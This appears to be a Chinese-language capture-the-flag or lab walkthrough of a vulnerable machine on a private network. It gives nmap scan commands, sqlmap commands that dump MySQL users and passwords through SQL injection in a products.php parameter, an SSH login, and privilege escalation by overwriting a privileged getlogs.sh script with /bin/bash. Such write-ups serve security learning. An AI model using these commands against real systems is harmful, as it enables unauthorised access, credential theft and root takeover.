一、信息收集
1、主机发现
nmap 192.168.1.0/24
2、端口扫描
nmap 192.168.1.120 -p-
二、漏洞探测
- 访问ip地址,点击Add Product,发现提交页面
- 填写信息后点击View Products查看,选择刚才添加的产品,提交
- 可以发现URL为http://192.168.1.120/products.php?id=1,可能存在SQL注入,利用sqlmap
python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" --batch
- 获取所有用户和密码
python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" --batch -D mysql --users --passwords
- 使用ccoffee用户进行ssh远程连接
三、提权
- 寻找suid文件,用户
ccoffee
位于路径 /home/ccoffee/scripts/getlogs.sh
下,可以执行 getlogs.sh
命令内的任何命令
find / -perm -u=s -type f 2>/dev/null
- 将
getlogs.sh
移动到 getlogs.sh.bak
,然后创建一个新的 getlogs.sh
文件以生成 shell
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" > getlogs.sh
chmod 777 getlogs.sh
- 执行该文件,执行whoami,id发现提权成功